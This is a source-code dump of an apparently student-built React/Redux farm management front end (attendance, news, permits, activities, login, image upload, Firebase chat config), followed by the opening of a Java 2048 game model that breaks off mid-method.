ATTENDANCE_NEW: 'ATTENDANCE_NEW',
ATTENDANCE_DELETE: 'ATTENDANCE_DELETE',
ATTENDANCE_UPDATE: 'ATTENDANCE_UPDATE'
};<file_sep>/src/Constants/newsConstant.js
export const newsConstants = {
NEWS_SHOW: 'NEWS_SHOW',
NEWS_NEW: 'NEWS_NEW',
NEWS_DELETE: 'NEWS_DELETE',
NEWS_UPDATE: 'NEWS_UPDATE'
};<file_sep>/src/Constants/activityConstant.js
export const activityConstants = {
ACTIVITY_SHOW: 'ACTIVITY_SHOW',
ACTIVITY_NEW: 'ACTIVITY_NEW',
ACTIVITY_DELETE: 'ACTIVITY_DELETE',
ACTIVITY_UPDATE: 'ACTIVITY_UPDATE'
};<file_sep>/src/container/Permit/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getPermit, editPermit, newPermit, removePermit } from '../../ActionCreators/permitAction'
class Permit extends Component {
constructor(props) {
super(props);
this.state = {
"user_id": "2",
"photopath": "1596539562Screenshot 2020-07-31 at 8.49.38 PM.png",
"isApproved": "1",
"name": "first"
};
};
componentDidMount() {
this.props.getPermit(1)
};
handleShowPermit = () => {
// const obj = this.state;
debugger
this.props.getPermit(1)
};
handleUpdatePermit = () => {
const obj = this.state;
debugger
this.props.editPermit(1, obj)
};
handleNewPermit = () => {
const obj = this.state;
debugger
this.props.newPermit(obj)
};
handleDeletePermit = () => {
const obj = this.state;
debugger
this.props.removePermit(obj)
};
render() {
console.log(this.props.permit)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowPermit()
}}>Display permit</button>
<button onClick={() => {
this.handleUpdatePermit()
}}>Update permit</button>
<button onClick={() => {
this.handleNewPermit()
}}>New permit</button>
<button onClick={() => {
this.handleDeletePermit()
}}>Delete permit</button>
</div>
);
};
};
const mapStateToProps = (state) => {
return {
permit: state.permitReducers.permit
};
};
const mapDispatchToProps = {
getPermit,
editPermit,
newPermit,
removePermit
};
export default connect(mapStateToProps, mapDispatchToProps)(Permit);
<file_sep>/src/container/Activity/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getActivity, editActivity, newActivity, removeActivity } from '../../ActionCreators/activityAction'
class Activity extends Component {
constructor(props) {
super(props);
this.state = {
"title": "demo",
"descr": "descr",
"date": "0000-00-00",
"time": "00:00:00",
"activity_by": "1",
"activity_to": "1",
"isComplete": "0",
"isReassigned": "0",
"weather": "1",
"remark": "none",
"elevation": "1",
"lat": "1",
"longtitute": "1",
"image": "Screenshot 2020-07-31 at 8.49.38 PM.png"
};
};
componentDidMount() {
this.props.getActivity(1)
};
handleShowActivity = () => {
// const obj = this.state;
debugger
this.props.getActivity(1)
};
handleUpdateActivity = () => {
const obj = this.state;
debugger
this.props.editActivity(1, obj)
};
handleNewActivity = () => {
const obj = this.state;
debugger
this.props.newActivity(obj)
};
handleDeleteActivity = () => {
const obj = this.state;
debugger
this.props.removeActivity(obj)
};
render() {
console.log(this.props.activity)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowActivity()
}}>Display activity</button>
<button onClick={() => {
this.handleUpdateActivity()
}}>Update activity</button>
<button onClick={() => {
this.handleNewActivity()
}}>New activity</button>
<button onClick={() => {
this.handleDeleteActivity()
}}>Delete activity</button>
</div>
);
};
};
const mapStateToProps = (state) => {
return {
activity: state.activityReducers.activity
};
};
const mapDispatchToProps = {
getActivity,
editActivity,
newActivity,
removeActivity
};
export default connect(mapStateToProps, mapDispatchToProps)(Activity);
<file_sep>/src/container/validation.js
import React from 'react';
import SignUp from '../container/Login/signup';
import SignIn from '../container/Login/signin';
const nameValidation = (fieldName, fieldValue) => {
if (fieldValue.trim() === '') {
return `${fieldName} is required`;
}
if (/[^a-zA-Z -]/.test(fieldValue)) {
return 'Invalid characters';
}
if (fieldValue.trim().length < 3) {
return `${fieldName} needs to be at least three characters`;
}
return null;
};
const emailValidation = Email => {
if (
/^[a-zA-Z0-9.!#$%&’*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/.test(
Email,
)
) {
return null;
}
if (Email.trim() === '') {
return 'Email is required';
}
return 'Please enter a valid email';
};
const mobileValidation = (fieldNumber, fieldValue) => {
if (fieldValue.trim() === '') {
return `${fieldNumber} is required`;
}
if (/[^0-9]/.test(fieldValue)) {
return 'Invalid characters';
}
if (fieldValue.trim().length == 10) {
return `${fieldNumber} must be ten digits`;
}
return null;
};
const altmobileValidation = (fieldNumber, fieldValue) => {
if (fieldValue.trim() === '') {
return `${fieldNumber} is required`;
}
if (/[^0-9]/.test(fieldValue)) {
return 'Invalid characters';
}
if (fieldValue.trim().length == 10) {
return `${fieldNumber} must be ten digits`;
}
return null;
};
const passwordValidation = (fieldPassword, fieldValue) => {
if (fieldValue.trim() === '') {
return `${fieldPassword} is required`;
}
if (/[a-zA-Z0-9.!#$%&’*]/.test(fieldValue)) {
return 'Invalid characters';
}
if (fieldValue.trim().length >= 6) {
return `${fieldPassword} must be ten digits`;
}
return null;
};
const addressValidation = (fieldAddress, fieldValue) => {
if (fieldValue.trim() === '') {
return `${fieldAddress} is required`;
}
if (/[a-zA-Z0-9/-]/.test(fieldValue)) {
return 'Invalid characters';
}
if (fieldValue.trim().length > 6) {
return `${fieldAddress} must be ten digits`;
}
return null;
};
const dobValidation = (fieldDOB, fieldValue) => {
if (fieldValue.trim() === '') {
return `${fieldDOB} is required`;
}
if (/[0-9/-]/.test(fieldValue)) {
return 'Invalid characters';
}
if (fieldValue.trim().length > 6) {
return `${fieldDOB} must be ten digits`;
}
return null;
};
const validate = {
Name: Name => nameValidation('Name', Name),
Email: emailValidation,
Mobile: Mobile => mobileValidation('Mobile', Mobile),
AltMobile: AltMobile => altmobileValidation('AltMobile', AltMobile),
Password: Password => passwordValidation('Password', Password),
Address: Address => addressValidation('Address', Address),
DateOfBirth: DateOfBirth => dobValidation('DateOfBirth', DateOfBirth)
};
const initialValues = {
Name: 'Demo',
Email: '<EMAIL>',
Mobile: '1234567890',
AltMobile: '1234567890',
Password: '',
Address: 'abcxyz',
DateOfBirth: '00-00-0000'
};
<file_sep>/src/Constants/dashboardConstant.js
export const dashboardConstants = {
DASHBOARD_SHOW: 'DASHBOARD_SHOW',
};<file_sep>/src/ActionCreators/attendenceAction.js
import {attendanceConstants} from '../Constants/attendanceConstant'
import {showAttendance, addAttendance, deleteAttendance, updateAttendance} from '../Utility/API/attendanceServices'
function attendanceShow(details) {
return {
type: attendanceConstants.ATTENDANCE_SHOW,
payload: details
};
};
function attendanceUpdate(details) {
return {
type: attendanceConstants.ATTENDANCE_UPDATE,
payload: details
};
};
function attendanceAdd(details) {
return {
type: attendanceConstants.ATTENDANCE_NEW,
payload: details
};
};
function attendanceDelete(details) {
return {
type: attendanceConstants.ATTENDANCE_DELETE,
payload: details
};
};
function getAttendance(userId) {
return dispatch => {
showAttendance(userId)
.then(res => {
const data = res.data.details
dispatch(attendanceShow(data))
})
.catch(err => {
})
};
};
function editAttendance(id, data) {
debugger
return dispatch => {
updateAttendance(id, data)
.then(res => {
debugger
const data = res.data.details
dispatch(attendanceUpdate(data))
})
.catch(err => {
debugger
})
};
};
function newAttendance(obj) {
return dispatch => {
addAttendance(obj)
.then(res => {
const data = res.data.details
dispatch(attendanceAdd(data))
})
.catch(err => {
})
};
};
function removeAttendance(obj) {
return dispatch => {
deleteAttendance(obj)
.then(res => {
const data = res.data.details
dispatch(attendanceDelete(data))
})
.catch(err => {
})
};
};
export {getAttendance, editAttendance, newAttendance, removeAttendance}<file_sep>/src/container/Users/userpage.js
import React, {Component} from 'react';
class UserPage extends Component {
// constructor(props) {
// super(props)
// };
render() {
// const {category} = this.props
return(
<div>
Welcome
</div>
)
}
}
export default UserPage;<file_sep>/src/ActionCreators/dashboardAction.js
import {dashboardConstants} from '../Constants/dashboardConstant'
import {showDashboard} from '../Utility/API/dashboardServices'
function dashboardShow(details) {
return {
type: dashboardConstants.DASHBOARD_SHOW,
payload: details
};
};
function getDashboard(userId) {
return dispatch => {
showDashboard(userId)
.then(res => {
const data = res.data.details
dispatch(dashboardShow(data))
})
.catch(err => {
})
};
};
export {getDashboard};<file_sep>/src/container/Header/logo.js
import React from 'react';
const logo = () =>
<header id="top-bar" className="top-bar top-bar--style-1">
<div className="container-fluid">
<div className="row align-items-center justify-content-between no-gutters">
<a className="top-bar__logo site-logo" href="index.html">
<img className="img-fluid site-logo" src="img/farmlogo.png" alt="demo" />
</a>
</div>
</div>
</header>
export default logo;
<file_sep>/src/Reducers/signinReducers.js
import {userConstants} from '../Constants/userConstants';
export function authentication(state = {}, action) {
switch (action.type) {
case userConstants.LOGIN_REQUEST:
return {
loggingIn: true,
message: action.message
};
case userConstants.LOGIN_SUCCESS:
return {
loggedIn: true,
message: action.message
};
case userConstants.LOGIN_FAILURE:
return {};
default:
return state
};
};<file_sep>/src/App.js
import React, { Component } from 'react';
import './App.css';
import { Provider } from 'react-redux';
import agrostore from './agrostore';
import SignIn from './container/Login/signin';
import SignUp from './container/Login/signup';
import UserPage from './container/Users/userpage';
import ImgUpload from './container/Query/imgupload';
import Attendance from './container/Attendance/index';
import Query from './container/Query/index';
import Permit from './container/Permit/index';
import News from './container/News/index';
import Notification from './container/Notification/index';
import Activity from './container/Activity/index';
import Dashboard from './container/Dashboard/index';
import Wrapper from './container/Wrapper/wrapper';
import {
BrowserRouter as Router,
Switch,
Route
} from 'react-router-dom';
class App extends Component {
// constructor(props) {
// super(props);
// };
render() {
return (
<Provider store={agrostore}>
<Router>
<Switch>
<Route exact path='/signup'>
<Wrapper><SignUp /></Wrapper>
</Route>
<Route exact path='/signin'>
<Wrapper><SignIn /></Wrapper>
</Route>
<Route exact path='/'>
<Wrapper><SignIn /></Wrapper>
</Route>
<Route exact path='/userpage'>
<Wrapper><UserPage /></Wrapper>
</Route>
<Route exact path='/imgupload'>
<Wrapper><ImgUpload /></Wrapper>
</Route>
<Route exact path='/attendance'>
<Wrapper><Attendance /></Wrapper>
</Route>
<Route exact path='/query'>
<Wrapper><Query /></Wrapper>
</Route>
<Route exact path='/permit'>
<Wrapper><Permit /></Wrapper>
</Route>
<Route exact path='/news'>
<Wrapper><News /></Wrapper>
</Route>
<Route exact path='/notification'>
<Wrapper><Notification /></Wrapper>
</Route>
<Route exact path='/activity'>
<Wrapper><Activity /></Wrapper>
</Route>
<Route exact path='/dashboard'>
<Wrapper><Dashboard /></Wrapper>
</Route>
</Switch>
</Router>
</Provider>
);
};
};
export default App;
<file_sep>/src/container/Login/signin.js
import React, { Component } from 'react';
import {connect} from 'react-redux';
import {userActions} from '../../ActionCreators/userActions';
import {history} from '../../history';
class SignIn extends Component {
constructor(props) {
super(props)
// for demo, Email: <EMAIL> and password: <PASSWORD>
this.state = {
Email: "",
Password: "",
submitted: false
};
};
onButtonClick = () => {
history.push('/signup')
};
onhandleChange = (event) => {
const {value, name} = event.target;
this.setState({
[name]: value
});
};
onhandleButton = (e) => {
this.setState({submitted: true});
const { Email, Password } = this.state;
const user = { Email, Password }
if (Email && Password) {
this.props.Login_In(user);
};
// history.push('/userpage')
};
render() {
const {loggingIn} = this.props;
const {Email, Password, submitted} = this.state;
return (
<div className="section">
<div className="container">
<div className="row">
<div className="col-12 col-md-6 col-lg-5 col-xl-4 offset-lg-1 offset-xl-2">
<h2>Sign <span>in</span></h2>
<form className="auth-form" action="#">
<div className={"input-wrp" + (submitted && !Email ? 'has-error' : '')}>
<input className="textfield" type="text" name='Email' value={Email} onChange={this.onhandleChange}
placeholder="<EMAIL>" />
{submitted && !Email && <div className="help-block">Email is required</div>}
</div>
<div className={"input-wrp" + (submitted && !Password ? 'has-error' : '')}>
<input className="textfield" type="text" name='Password' value={Password} onChange={this.onhandleChange}
placeholder="<PASSWORD>" />
{submitted && !Password && <div className="help-block">Password is required</div>}
</div>
<div className="row align-items-center justify-content-between">
<div className="col-auto">
<label className="checkfield align-bottom">
<input type="checkbox" checked="" />
<i></i>
Remember me
</label>
</div>
<div className="col-auto">
<a className="link-forgot" href="#"> forgot password?</a>
</div>
</div>
<div className="d-table mt-8">
<div className="d-table-cell align-middle">
<button className="custom-btn custom-btn--medium custom-btn--style-1" type="submit" role="button" onClick={this.onhandleButton}>LOGIN</button>
{loggingIn}
</div>
<div className="d-table-cell align-middle">
<a><button className="link-to" href="#" onClick={this.onButtonClick}>SIGN UP</button></a>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
)
}
};
function mapState(state) {
const {loggingIn} = state.userReducers;
return {
loggingIn
};
};
const createActions = {
Login_In: userActions.Login_In
};
const connectSignIn = connect(mapState, createActions)(SignIn);
export default connectSignIn;<file_sep>/src/container/Query/imgupload.js
import React, { Component } from 'react';
import axios from 'axios';
class ImgUpload extends Component {
constructor(props) {
super(props)
this.state = {
selectedFile: null,
imagePreviewURL: "",
imagePreview: null,
details: ""
};
};
onHandleSubmit = (e) => {
console.log('handle uploading', this.state.selectedFile, this.state.details)
};
fileSelected = (e) => {
this.setState({
selectedFile: e.target.files
})
};
fileUpload = () => {
debugger
let fd = new FormData();
fd.append('image', this.state.selectedFile);
fd.append('name', 'sample');
axios.post('http://logicalloop.com/farmeasy/api/User/query/new',
{fd}
)
.then(
res => {
debugger
console.log(res.data);
}
)
.catch(
error => {
debugger
console.log(error);
}
)
};
onHandleChange = (event) => {
const { name, value } = event.target;
this.setState({
[name]: value
})
};
render() {
let { imagePreviewURL, imagePreview, details } = this.state;
if (imagePreviewURL) {
imagePreview = (<img src={imagePreviewURL} />);
}
else {
imagePreview = (<div className="previewText">
Please select an image for Preview
</div>)
};
return (
<div className="previewComponent">
<form onSubmit={this.onHandleSubmit}>
<input className="fileInput"
// style={{display: "none"}}
type="file" multiple name='selectedFile'
onChange={this.fileSelected} />
{/* ref={fileInput => this.fileInput = fileInput} */}
{/* <tr>
<button
onClick={() => this.fileInput.click()}>
Pick File
</button>
</tr> */}
<tr>
<button className="submitButton"
type="submit"
onClick={this.fileUpload}>
Upload
</button>
</tr>
<input className="textfield" type="text" name='details' value={details} onChange={this.onHandleChange}
placeholder="Description of selected image*" />
</form>
<div className="imagePreview">
{imagePreview}
</div>
</div>
)
};
};
export default ImgUpload;
<file_sep>/src/container/Dashboard/index.js
import React, { Component } from "react"
import { connect } from 'react-redux'
import {getDashboard} from '../../ActionCreators/dashboardAction'
class Dashboard extends Component {
constructor(props) {
super(props)
this.state = {};
};
componentDidMount() {
this.props.getDashboard(1)
};
handleShowDashboard = () => {
debugger
this.props.getDashboard(1)
};
render() {
console.log(this.props.details)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowDashboard()
}}>Display dashboard</button>
</div>
);
};
};
const mapStateToProps = (state) => {
return {
details: state.dashboardReducers.details
};
};
const mapDispatchToProps = {
getDashboard
};
export default connect(mapStateToProps, mapDispatchToProps)(Dashboard);<file_sep>/src/Constants/notificationConstant.js
export const notificationConstants = {
NOTIFICATION_SHOW: 'NOTIFICATION_SHOW',
NOTIFICATION_NEW: 'NOTIFICATION_NEW',
NOTIFICATION_DELETE: 'NOTIFICATION_DELETE',
NOTIFICATION_UPDATE: 'NOTIFICATION_UPDATE'
};<file_sep>/src/ActionCreators/notificationAction.js
import {notificationConstants} from '../Constants/notificationConstant'
import {showNotification, addNotification, deleteNotification, updateNotification} from '../Utility/API/notificationServices'
function notificationShow(notification) {
return {
type: notificationConstants.NOTIFICATION_SHOW,
payload: notification
};
};
function notificationUpdate(notification) {
return {
type: notificationConstants.NOTIFICATION_UPDATE,
payload: notification
};
};
function notificationAdd(notification) {
return {
type: notificationConstants.NOTIFICATION_NEW,
payload: notification
};
};
function notificationDelete(notification) {
return {
type: notificationConstants.NOTIFICATION_DELETE,
payload: notification
};
};
function getNotification(userId) {
return dispatch => {
showNotification(userId)
.then(res => {
const data = res.data.notification
dispatch(notificationShow(data))
})
.catch(err => {
})
};
};
function editNotification(id, data) {
debugger
return dispatch => {
updateNotification(id, data)
.then(res => {
debugger
const data = res.data.notification
dispatch(notificationUpdate(data))
})
.catch(err => {
debugger
})
};
};
function newNotification(obj) {
return dispatch => {
addNotification(obj)
.then(res => {
const data = res.data.notification
dispatch(notificationAdd(data))
})
.catch(err => {
})
};
};
function removeNotification(obj) {
return dispatch => {
deleteNotification(obj)
.then(res => {
const data = res.data.notification
dispatch(notificationDelete(data))
})
.catch(err => {
})
};
};
export {getNotification, editNotification, newNotification, removeNotification}<file_sep>/src/Reducers/notificationReducer.js
import {notificationConstants} from '../Constants/notificationConstant';
const initialState = {
notification: []
};
export const notificationReducers = (state=initialState, action) => {
switch (action.type) {
case notificationConstants.NOTIFICATION_SHOW:
debugger
return {
...state,
notification: action.payload
};
case notificationConstants.NOTIFICATION_UPDATE:
debugger
return {
...state,
notification: action.payload
}
case notificationConstants.NOTIFICATION_NEW:
debugger
return {
...state,
notification: action.payload
}
case notificationConstants.NOTIFICATION_DELETE:
debugger
return {
...state,
notification: action.payload
}
default:
return state
};
};<file_sep>/src/Utility/API/newsServices.js
import {HttpClient} from '../httpClient'
import urlMapper from '../urlMapper'
const showNews = (id) => {
return new Promise((resolve, reject) => {
return HttpClient.get(`${urlMapper.getNews}${id}`)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const addNews = (data) => {
return new Promise((resolve, reject) => {
return HttpClient.post(`${urlMapper.addNews}`,data)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const deleteNews = (id) => {
return new Promise((resolve, reject) => {
return HttpClient.delete(`${urlMapper.deleteNews}${id}`)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const updateNews = (id, data) => {
debugger
return new Promise((resolve, reject) => {
return HttpClient.post(`${urlMapper.updateNews}${id}`, data)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
export {showNews, addNews, deleteNews, updateNews};<file_sep>/src/Constants/queryConstant.js
export const queryConstants = {
QUERY_SHOW: 'QUERY_SHOW',
QUERY_NEW: 'QUERY_NEW',
QUERY_DELETE: 'QUERY_DELETE',
QUERY_UPDATE: 'QUERY_UPDATE'
};<file_sep>/src/ActionCreators/userActions.js
import {userConstants} from '../Constants/userConstants';
import {alertActions} from '../ActionCreators/alertActions';
import axios from 'axios';
export const userActions = {
Login_In,
// Login_Up
};
function Login_In(user) {
return dispatch => {
// dispatch(request({usrname, pswd}));
let cred = {
email: user.usrname,
password: <PASSWORD>
};
debugger
axios.post("http://logicalloop.com/farmeasy/api/login",
{cred}
)
.then(
res => {debugger
console.log(res.data);
}
)
.catch(
error => {debugger
console.log(error);
}
)
// .then(
// user => {
// dispatch(success(cred));
// dispatch(alertActions.success(success));
// })
// .catch(
// error => {
// dispatch(failure(cred));
// dispatch(alertActions.error(error));
// })
};
// function request(user) {
// return {
// type: userConstants.LOGIN_REQUEST, user
// };
// };
// function success(user) {
// return {
// type: userConstants.LOGIN_SUCCESS, user
// };
// };
// function failure(user) {
// return {
// type: userConstants.LOGIN_FAILURE, user
// };
// };
};
function Login_Up(user) {
return dispatch => {
// dispatch(request(user));
axios.post("https://logicalloop.com/farmeasy/api/signup",
{user}
)
.then(
res=> {
console.log(res.data);
}
)
.catch(
res => {
console.log(res.data);
}
)
};
// .then(
// user => {
// dispatch(success(user));
// dispatch(alertActions.success('Registration successful'))
// })
// .catch(
// error => {
// dispatch(failure(error));
// dispatch(alertActions.error(error));
// })
// };
// function request(user) {
// return {
// type: userConstants.REGISTER_REQUEST, user
// };
// };
// function success(user) {
// return {
// type: userConstants.REGISTER_SUCCESS, user
// };
// };
// function failure(user) {
// return {
// type: userConstants.REGISTER_FAILURE, user
// };
// };
};<file_sep>/src/Utility/API/activityServices.js
import {HttpClient} from '../httpClient'
import urlMapper from '../urlMapper'
const showActivity = (id) => {
return new Promise((resolve, reject) => {
return HttpClient.get(`${urlMapper.getActivity}${id}`)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const addActivity = (data) => {
return new Promise((resolve, reject) => {
return HttpClient.post(`${urlMapper.addActivity}`,data)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const deleteActivity = (id) => {
return new Promise((resolve, reject) => {
return HttpClient.delete(`${urlMapper.deleteActivity}${id}`)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const updateActivity = (id, data) => {
debugger
return new Promise((resolve, reject) => {
return HttpClient.post(`${urlMapper.updateActivity}${id}`, data)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
export {showActivity, addActivity, deleteActivity, updateActivity};<file_sep>/src/ActionCreators/permitAction.js
import {permitConstants} from '../Constants/permitConstant'
import {showPermit, addPermit, deletePermit, updatePermit} from '../Utility/API/permitServices'
function permitShow(permit) {
return {
type: permitConstants.PERMIT_SHOW,
payload: permit
};
};
function permitUpdate(permit) {
return {
type: permitConstants.PERMIT_UPDATE,
payload: permit
};
};
function permitAdd(permit) {
return {
type: permitConstants.PERMIT_NEW,
payload: permit
};
};
function permitDelete(permit) {
return {
type: permitConstants.PERMIT_DELETE,
payload: permit
};
};
function getPermit(userId) {
return dispatch => {
showPermit(userId)
.then(res => {
const data = res.data.permit
dispatch(permitShow(data))
})
.catch(err => {
})
};
};
function editPermit(id, data) {
debugger
return dispatch => {
updatePermit(id, data)
.then(res => {
debugger
const data = res.data.permit
dispatch(permitUpdate(data))
})
.catch(err => {
debugger
})
};
};
function newPermit(obj) {
return dispatch => {
addPermit(obj)
.then(res => {
const data = res.data.permit
dispatch(permitAdd(data))
})
.catch(err => {
})
};
};
function removePermit(obj) {
return dispatch => {
deletePermit(obj)
.then(res => {
const data = res.data.permit
dispatch(permitDelete(data))
})
.catch(err => {
})
};
};
export {getPermit, editPermit, newPermit, removePermit}<file_sep>/src/Reducers/dashboardReducer.js
import {dashboardConstants} from '../Constants/dashboardConstant'
const initialState = {
details: []
};
export const dashboardReducers = (state=initialState, action) => {
switch (action.type) {
case dashboardConstants.DASHBOARD_SHOW:
debugger
return {
...state,
details: action.payload
};
default:
return state
};
};<file_sep>/src/Utility/API/permitServices.js
import {HttpClient} from '../httpClient'
import urlMapper from '../urlMapper'
const showPermit = (id) => {
return new Promise((resolve, reject) => {
return HttpClient.get(`${urlMapper.getPermit}${id}`)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const addPermit = (data) => {
return new Promise((resolve, reject) => {
return HttpClient.post(`${urlMapper.addPermit}`,data)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const deletePermit = (id) => {
return new Promise((resolve, reject) => {
return HttpClient.delete(`${urlMapper.deletePermit}${id}`)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
const updatePermit = (id, data) => {
debugger
return new Promise((resolve, reject) => {
return HttpClient.post(`${urlMapper.updatePermit}${id}`, data)
.then(res => {
debugger
resolve(res)
})
.catch(err => {
debugger
reject(err)
})
})
};
export {showPermit, addPermit, deletePermit, updatePermit};<file_sep>/src/container/News/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getNews, editNews, newNews, removeNews } from '../../ActionCreators/newsAction'
class News extends Component {
constructor(props) {
super(props);
this.state = {
"news_type": "abc",
"title": "abc",
"description": "demo",
"datetime": "2020-08-04 11:34:21",
"isActive": "1"
};
};
componentDidMount() {
this.props.getNews(5)
};
handleShowNews = () => {
// const obj = this.state;
debugger
this.props.getNews(5)
};
handleUpdateNews = () => {
const obj = this.state;
debugger
this.props.editNews(5, obj)
};
handleNewNews = () => {
const obj = this.state;
debugger
this.props.newNews(obj)
};
handleDeleteNews = () => {
const obj = this.state;
debugger
this.props.removeNews(obj)
};
render() {
console.log(this.props.news)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowNews()
}}>Display news</button>
<button onClick={() => {
this.handleUpdateNews()
}}>Update news</button>
<button onClick={() => {
this.handleNewNews()
}}>New news</button>
<button onClick={() => {
this.handleDeleteNews()
}}>Delete news</button>
</div>
);
};
};
const mapStateToProps = (state) => {
return {
news: state.newsReducers.news
};
};
const mapDispatchToProps = {
getNews,
editNews,
newNews,
removeNews
};
export default connect(mapStateToProps, mapDispatchToProps)(News);
<file_sep>/src/Reducers/newsReducer.js
import {newsConstants} from '../Constants/newsConstant';
const initialState = {
news: []
};
export const newsReducers = (state=initialState, action) => {
switch (action.type) {
case newsConstants.NEWS_SHOW:
debugger
return {
...state,
news: action.payload
};
case newsConstants.NEWS_UPDATE:
debugger
return {
...state,
news: action.payload
}
case newsConstants.NEWS_NEW:
debugger
return {
...state,
news: action.payload
}
case newsConstants.NEWS_DELETE:
debugger
return {
...state,
news: action.payload
}
default:
return state
};
};<file_sep>/src/container/ChatBox/chatservices/firebase.js
import firebase from "firebase/app";
import "firebase/auth";
import "firebase/database";
var firebaseConfig = {
apiKey: "<KEY>",
authDomain: "myfarmeasychatdemo.firebaseapp.com",
databaseURL: "https://myfarmeasychatdemo.firebaseio.com",
projectId: "myfarmeasychatdemo",
storageBucket: "myfarmeasychatdemo.appspot.com",
messagingSenderId: "428961958095",
appId: "1:428961958095:web:404056fa92692dbf274fba",
measurementId: "G-ZQ51X904J7"
};
firebase.initializeApp(firebaseConfig);
// firebase.analytics();
export const auth = firebase.auth;
export const db = firebase.database(); | 6b8425d971c8ae56838e3ec6e3f2e4580c767fec | [
"JavaScript"
] | 32 | JavaScript | inv-Karan/argo_ll_react | 0f9b1e2e3006b771d42af2efb6e05a3ba8ff16e3 | 26f0510a57420d2dc141d1b1cac146aa9ce80db1 |
refs/heads/master | <repo_name>justignatoff/2048<file_sep>/src/Model.java
import java.util.*;
public class Model {
private static final int FIELD_WIDTH = 4;
private Tile [][] gameTiles;
private boolean isSaveNeeded = true;
int score = 0;
int maxTile = 0;
private Stack<Tile[][]> previousStates = new Stack<>();
private Stack<Integer> previousScores = new Stack<>();
public Model() {
resetGameTiles();
}
private void saveState(Tile[][] tiles) {
Tile [][] tmpGame = new Tile[FIELD_WIDTH][FIELD_WIDTH];
for (int i = 0; i < FIELD_WIDTH; i ++)
for (int j = 0; j < FIELD_WIDTH; j ++)
tmpGame[i][j] = new Tile(tiles[i][j].value);
previousStates.push(tmpGame);
previousScores.push(score);
isSaveNeeded = false;
}
public void rollback() {
if (!previousStates.isEmpty())
if (!previousScores.isEmpty()) {
gameTiles = (Tile[][]) previousStates.pop();
score = (int) previousScores.pop();
}
}
public Tile[][] getGameTiles() {
return gameTiles;
}
public boolean canMove() {
if(!getEmptyTiles().isEmpty())return true;
for(int i = 0; i < FIELD_WIDTH; i++) {
for(int j = 0; j < FIELD_WIDTH-1; j++) {
if (gameTiles[i][j].value == gameTiles[i][j+1].value) return true;
}
}
for(int i = 0; i < FIELD_WIDTH; i++) {
for (int j = 0; j < FIELD_WIDTH-1; j++) {
if(gameTiles[j][i].value == gameTiles[j+1][i].value) return true;
}
}
return false;
}
public void addTile () {
List<Tile> list = getEmptyTiles();
if (!list.isEmpty()) {
list.get((int) (list.size() * Math.random())).value = (Math.random() < 0.9 ? 2 : 4);
}
}
private List<Tile> getEmptyTiles() {
List<Tile> emptyList = new ArrayList<>();
for (int i = 0; i < gameTiles.length; i ++)
for (int j = 0; j < gameTiles.length; j ++)
if (gameTiles[i][j].value == 0)
emptyList.add(gameTiles[i][j]);
return emptyList;
}
void resetGameTiles() {
gameTiles = new Tile[FIELD_WIDTH][FIELD_WIDTH];
for (int i = 0; i < gameTiles.length; i ++)
for (int j = 0; j < gameTiles.length; j ++)
gameTiles[i][j] = new Tile();
addTile();
addTile();
}
private boolean compressTiles(Tile[] tiles) {
boolean anyChange = false;
for (int i = 0; i < tiles.length; i ++) {
if (tiles[i].value == 0) {
outer:
for (int j = i+1; j < tiles.length; j++) {
if (tiles[j].value != 0) {
tiles[i].value = tiles[j].value;
tiles[j].value = 0;
anyChange = true;
break outer;
}
}
}
}
return anyChange;
}
private boolean mergeTiles(Tile[] tiles) {
boolean change = false;
for (int i = 0; i < tiles.length; i++) {
try {
if (tiles[i].value > 0 && tiles[i].value == tiles[i + 1].value) {
tiles[i].value += tiles[i + 1].value;
// Если выполняется условие слияния плиток, проверяем является ли новое значения больше максимального
// и при необходимости меняем значение поля maxTile.
if (tiles[i].value > maxTile) {
maxTile = tiles[i].value;
}
//Увеличиваем значение поля score на величину веса плитки образовавшейся в результате слияния.
score += tiles[i].value;
change = true;
for (int j = i + 1; j < tiles.length; j++) {
if (j != tiles.length - 1) {
tiles[j].value = tiles[j + 1].value;
} else tiles[j].value = 0;
}
}
}catch (ArrayIndexOutOfBoundsException ex) {
continue;
}
}
return change;
}
public void left() {
boolean isChange = false;
if (isSaveNeeded)
saveState(gameTiles);
for (int i = 0; i < gameTiles.length; i ++) {
boolean compress = compressTiles(gameTiles[i]);
boolean merge = mergeTiles(gameTiles[i]);
if (compress | merge)
isChange = true;
}
if (isChange)
addTile();
isSaveNeeded = true;
}
public void up() {
saveState(gameTiles);
rotate90();
left();
rotate90();
rotate90();
rotate90();
}
public void right() {
saveState(gameTiles);
rotate90();
rotate90();
left();
rotate90();
rotate90();
}
public void down() {
saveState(gameTiles);
rotate90();
rotate90();
rotate90();
left();
rotate90();
}
private void rotate90(){
Tile [][] rotMat = new Tile[FIELD_WIDTH][FIELD_WIDTH];
for (int rw = 0; rw < gameTiles.length; rw++) {
for (int cl = 0; cl < gameTiles.length; cl++) {
rotMat[gameTiles.length - 1 - cl][rw] = gameTiles[rw][cl];
}
}
gameTiles = rotMat;
}
public void randomMove() {
int n = ((int)(Math.random()*100))%4;
switch (n) {
case 0 : left(); break;
case 1 : right(); break;
